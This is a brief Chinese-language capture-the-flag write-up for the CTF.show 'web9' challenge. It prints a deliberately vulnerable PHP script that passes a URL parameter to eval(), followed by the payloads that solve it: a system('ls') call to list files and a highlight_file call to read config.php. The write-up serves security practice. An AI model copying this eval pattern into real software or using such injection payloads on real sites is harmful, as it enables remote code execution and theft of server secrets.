CTF.show:萌新:web9
阿新 • • 發佈:2021-02-05
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
$c = $_GET['c'];
if(preg_match("/system|exec|highlight/i",$c)){
eval($c);
}else{
die("cmd error");
}
}else {
highlight_file(__FILE__);
}
?>
題目要求我們利用 system、exec、highlight才能執行eval()。
構造
?c=system('ls');
發現存在兩個檔案
構造
highlight_file() 函式對檔案進行語法高亮顯示。
?c=highlight_file(’config.php‘);
得到flag